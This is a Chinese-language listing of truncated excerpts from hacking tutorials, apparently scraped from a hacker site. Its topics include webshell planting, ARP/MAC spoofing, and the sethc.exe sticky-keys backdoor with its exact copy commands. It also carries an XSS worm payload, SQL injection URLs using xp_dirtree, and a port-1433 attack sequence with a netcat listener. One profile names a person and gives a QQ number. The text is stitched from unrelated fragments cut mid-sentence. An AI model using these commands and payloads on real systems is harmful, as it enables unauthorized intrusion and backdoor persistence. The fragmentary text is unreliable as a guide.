很多时候我们可以通过在注册表单或者用户信息修改表单中，插入简短的ASP代码，使网站ASP数据库变成为一个ASP木马，然后进一步入侵控制服务器。 不过在上传代码过程中，许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。 这样就有好多SHELL不能上传

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里，其实把一句话木马插入到PHP文件中就已经很隐蔽了，如果说硬是要放到HTML文件或图片里，就接着往下看的这篇测试报告吧。 要知道如果光把PHP语句放到图片里是无论如何也不能执行的，因为PHP只

WINDOWS访问139端口时自动用当前用户、密码连接，造成泄露用户密码，虽然其密码是加密的，但一样可以用来攻击。 下面是SMB的密码认证方式。 WINDOWS的139口的访问过程，箭头表示数据方向： 1.客户端--------------------建立TCP连接-----------------服务端

前言 通常，大家所说的入侵，都是针对一台主机，在获得管理员权限后，就很是得意；其实，真正的入侵是占领整个内部网络。针对内部网络的攻击方法比较 多，但比较有效的方法非ARP欺骗、DNS欺骗莫属了。但是，不管使用什么技术，无非都是抓取目标的数据包，然

所谓的 session cookie, 就是站台在你登录成功后，送上一个 cookie，表示你已经通过验证，但与一般cookie不同的是，他并不会存在你的硬盘上，也就是说：在你离开浏览器之后，就会消失，也就是意味：下次 你重开浏览器，再进此站，此 cookie 已经不见了。 那

一、前言 近年来，网络数据业务发展迅速，宽带用户呈爆炸式的增长，运营商在 采用xDSL，LAN，HFC，无线等多种接入方式的同时，为了构建一个可运营、可管理、可盈利的宽带网络，十分关心如何有效地完成用户的管 理，PPPoE（PPP over Ethernet）就是随之出现的

通常，大家所说的入侵，都是针对一台主机，在获得管理员权限后，就很是得意；其实，真正的入侵是占领整个内部网络。针对内部网络的攻击方法比较多，但比较 有效的方法非ARP欺骗、DNS欺骗莫属了。但是，不管使用什么技术，无非都是抓取目标的数据包，然后分析

管理员的玩笑 浅谈入侵中的一些小问题 BY剑心[B.C.T] 这两天很无聊，趁着放假的时 间就准备练习下自己的入侵技术，没有什么目标就准备测试下周围大学网站的安全性，顺便拿网站练练手。大部分这些网站的管理员应该说安全意识都不错的，毕竟 都是大学的管理员

在目标cmd执行如下命令： copyc:windowsexplorer.exec:windowssystem32sethc.exe copyc:windowssystem32sethc.exec:windowssystem32dllcachesethc.exe 那么连接目标终端，只需要连续敲击shift键5次，即可以进入桌面了。 copyc:windowsexplorer

可以这样测试: 察看日志： 1、打开控制面板 2、点击性能和维护 3、点击管理工具 4、运行事件察看器 5、在事件察看器左边点击系统 6、在右边滚上滚下找有没有事件号是4226的 如果你看到很多这个事件的话，说明SP2经常限制你的连接数 限制连接数的原因可能是因

到一些黑客站点上转转，发现那些最受欢迎、点击次数最多的文章都是一些教菜鸟使用木马入侵初级教 程之类文章，而Outlook Express HTML邮件超长字节href值缓冲溢出缺陷PHP fopen()函数易遭到CRLF Injection攻击这种文章却乏人问津，尽管这或许才是真正高手所

ARP欺骗的攻击和防御技术都比较成熟了，这里也不再阐述。此次重点讲解如何不用ARP欺骗进行嗅探以及会话劫持的技术原理，实际的攻击方法是进行MAC欺骗。 一、原理： 在开始之前我们先简单了解一下交换机转发过程：交换机的一个端口收到一个数据帧时，首先检查

Alexander Sotirov 和 Mark Dowd 这次在BlackHat的paper果然内容很丰富，链接就不加了， google一下应该就有。 这次paper里没啥新的东西，基本上是关于绕过GS/SAFESEH/HEAP/DEP/ASLR等技巧的一些总结。不过文章非常具有系统性，很多细节的地方讲的都很清楚。

作者：空虚浪子心【XGC】 【IT168专稿】 引言 因为一个0day，让作者对java applet心血来潮，随着不断的失败，发现了一个又一个安全特性。本文提醒大家，除了activeX，还有这么一种东西，一旦出现了安全隐患，也会帮大 家做些什么。如果你要找0DAY，请掠过;如

http://www.baidu.com/index.php?bar= [/url]/**/style=xss:expression(alert(xss)); 有点死循环的性质,无限弹窗. div id=xssworm. form name=form1 id=popFormSubmit action= method=post input type=hidden name=ct value=1 input type=hidden name=cm val

调整IE9安装包满足不同用户安装需求 IE9正式版已经发布了一段时间，大家在安装IE9时，一般都是直接运行下载到的安装包，按照提示一步步安装完成。微软开发团队在安装程序上进行了精心的设计，IE9的安装界面和操作步骤都已非常精简，安装速度也比之前的版本快

木马各种隐藏技术全方位大披露 以前，我曾认为只要不随便运行网友发来的文件就不会中 病毒 或木马，但后来出现了利用漏洞传播的冲击波、震荡波;以前，我曾认为不上小网站就不会中网页木马，但后来包括国内某知名游戏网站在内的多个大网站均在其首页被 黑客

第一招:屏幕保护 在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返

一、扫描 现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理，但80 21端口有很多服务器都有打开，没怎么特征性，于是我选择了23端口，打开我的至爱:SUPPERSCAN，填上我所在地区的IP段，(跨多几段都没关系，反正SUPPERSCAN的速度就是快)眨眼间，结果出来了

一、为何采用SlimFTP? 我们之所以会选择SlimFTP，是因为它体积

第一种方法: 这个是怪异的SQL注入中介绍的方法，利用sqlserver的xp_dirtree,好的我们先来将一下方法,然后再说其优劣处(在原文的基础上作了点补充) 建立表 语句：http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))-- 返回：正

第一种方法: 利用sqlserver的xp_dirtree,好的我们先来将一下方法,然后再说其优劣处(在原文的基础上作了点补充) 建立表 语句：http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))-- 返回：正常的信息!说明建表成功!继续! (建的

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 ============================= 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433

黑客这个让人又恨又怕又爱又敬的名称，让我们一起来认识一下中国第四代黑客人物。) 冰血封情 大家都知道了，前段时间有个《当今国内准高手黑客一览表》，冰血封情前辈首当其冲，详细介绍那里也有了，很牛的说，文章巨多。但是根据我个人和冰血封情前辈的接触

网名：janker(孤独剑客) 真实姓名：王献冰 OICQ：5385757 简介：掌握Asm和C语言的系统网络级编程，熟悉Windows和Unix等系统平台的维护与管理，精通前沿的模拟攻击与反黑客技术，能够熟练运用防火墙、扫描器、入侵检测系统、虚拟私有网、公共密钥体系和身份认